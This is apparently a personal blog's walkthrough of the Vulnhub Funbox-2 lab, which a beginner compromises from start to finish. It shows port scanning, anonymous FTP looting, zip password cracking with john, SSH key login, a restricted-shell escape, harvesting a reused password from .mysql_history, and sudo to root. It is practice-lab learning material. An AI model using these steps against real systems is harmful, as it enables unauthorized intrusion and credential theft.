ES, aka crazyeights225

ES, aka crazyeights225

Human, Interested in CyberSec and Algorithms, flag{aut0mat3_ev3ryth1ng}

Vulnhub: Funbox-2

It is the second box in the Funbox series. The Funbox series from Vulnhub is a great series for beginners. It has all the classic boot2root services.

Looking back, I really didn’t explain my steps here at all, yikes!

Scanning

crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Nmap scan report for 192.168.56.117
Host is up (0.000086s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
Focused Scan:
crazyeights@es-base:~$ nmap -A -p- 192.168.56.117

Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5e
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 anna.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 ariel.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:52 bud.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:58 cathrine.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 homer.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 jessica.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 john.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 marge.zip
| -rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:50 miriam.zip
| -r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip
| -rw-r--r--   1 ftp      ftp           170 Jan 10  2018 welcome.msg
|_-rw-rw-r--   1 ftp      ftp          1477 Jul 25 10:51 zlatan.zip
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA)
|   256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA)
|_  256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/logs/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration

Nothing on web server:

crazyeights@es-base:~$ dirb http://192.168.56.117

---- Scanning URL: http://192.168.56.117/ ----
+ http://192.168.56.117/index.html (CODE:200|SIZE:10918)                       
+ http://192.168.56.117/robots.txt (CODE:200|SIZE:17)                          
+ http://192.168.56.117/server-status (CODE:403|SIZE:279)

the disallowed entry (/logs/) in robots.txt doesn’t exist.

Checking out FTP:

Anonymous login:

crazyeights@es-base:~$ ftp 192.168.56.117
Connected to 192.168.56.117.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.56.117]
Name (192.168.56.117:crazyeights): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.56.1 !
230-
230-The local time is: Sun Oct 11 17:11:47 2020
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.

Downloading anna.zip:

local: anna.zip remote: anna.zip
200 PORT command successful
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
226 Transfer complete

It is password protected. We can use zip2john to get zip file hash, and then use john to crack it.

crazyeights@es-base:~$ zip2john anna.zip > anna_hash.txt

Cracking the hash:

crazyeights@es-base:~$ john --wordlist=lists/rockyou.txt --rules anna_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:47 DONE (2020-10-11 13:18) 0g/s 4869Kp/s 4869Kc/s 4869KC/s Bubbydoding..Aaaaaaaaaaaaing
Session completed

Didn’t get it. It is likely a rabbit hole.

Trying tom.zip because it is the only entry you can’t write to:

-r--r--r--   1 ftp      ftp          1477 Jul 25 10:44 tom.zip

Download tom.zip:

ftp> get tom.zip
local: tom.zip remote: tom.zip
200 PORT command successful
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
226 Transfer complete
1477 bytes received in 0.04 secs (39.8768 kB/s)

Getting the hash:

crazyeights@es-base:~$ zip2john tom.zip > tom_hash.txt`

Cracking the hash:

crazyeights@es-base:~$ john --wordlist=lists/rockyou.txt --rules tom_hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iubire           (tom.zip/id_rsa)
1g 0:00:00:01 DONE (2020-10-11 16:28) 0.9009g/s 29520p/s 29520c/s 29520C/s 123456..dyesebel
Use the "--show" option to display all of the cracked passwords reliably
Session completed
crazyeights@es-base:~$

Decompressing the archive gives you id_rsa an ssh private key, which may allow us to login to SSH without a password:

50333540 -rw------- 1 crazyeights crazyeights 1675 Jul 25 06:42 id_rsa

Logging in to ssh:

crazyeights@es-base:~$ ssh -i id_rsa tom@192.168.56.117
load pubkey "id_rsa": invalid format
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)


Last login: Sun Oct 11 20:33:26 2020 from 192.168.56.1
tom@funbox2:~$

We have a restricted shell (rbash), our first step should be to breakout.

Escaping rbash:

tom@funbox2:~$ cd /var/www/html
-rbash: cd: restricted
tom@funbox2:~$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
tom@funbox2:~$ bash -i
tom@funbox2:~$ cd /var/www/html

Poking around:

Nothing else on the web server:

tom@funbox2:~$ cd /var/www/html
tom@funbox2:/var/www/html$ ls
index.html  robots.txt

No other users:

tom@funbox2:/home$ ls
tom

Checking out .mysql_history

_HiStOrY_V2_
show\040databases;
quit
create\040database\040'support';
create\040database\040support;
use\040support
create\040table\040users;
show\040tables
;
select\040*\040from\040support
;
show\040tables;
select\040*\040from\040support;
insert\040into\040support\040(tom,\040xx11yy22!);
quit

You can see there is what might be a password on the line insert into support …

tom:xx11yy22!

Logging into mysql server:

tom@funbox2:~$ mysql -u tom -p'xx11yy22!'
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.30-0ubuntu0.18.04.1 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> 
[SNIP] - NOTHING INTERESTING

Using the same password as mySQL for Tom’s local password:

tom@funbox2:~$ sudo -l
[sudo] password for tom: 
Matching Defaults entries for tom on funbox2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tom may run the following commands on funbox2:
    (ALL : ALL) ALL

Getting the root flag:

tom@funbox2:~$ sudo su
root@funbox2:/home/tom# 

root@funbox2:/home/tom# cd /root
root@funbox2:~# ls
flag.txt
root@funbox2:~# cat flag.txt 
   ____  __  __   _  __   ___   ____    _  __             ___ 
  / __/ / / / /  / |/ /  / _ ) / __ \  | |/_/            |_  |
 / _/  / /_/ /  /    /  / _  |/ /_/ / _>  <             / __/ 
/_/    \____/  /_/|_/  /____/ \____/ /_/|_|       __   /____/ 
           ____ ___  ___  / /_ ___  ___/ /       / /          
 _  _  _  / __// _ \/ _ \/ __// -_)/ _  /       /_/           
(_)(_)(_)/_/   \___/\___/\__/ \__/ \_,_/       (_)            
                                                              
from @0815R2d2 with ♥
root@funbox2:~#

FIN.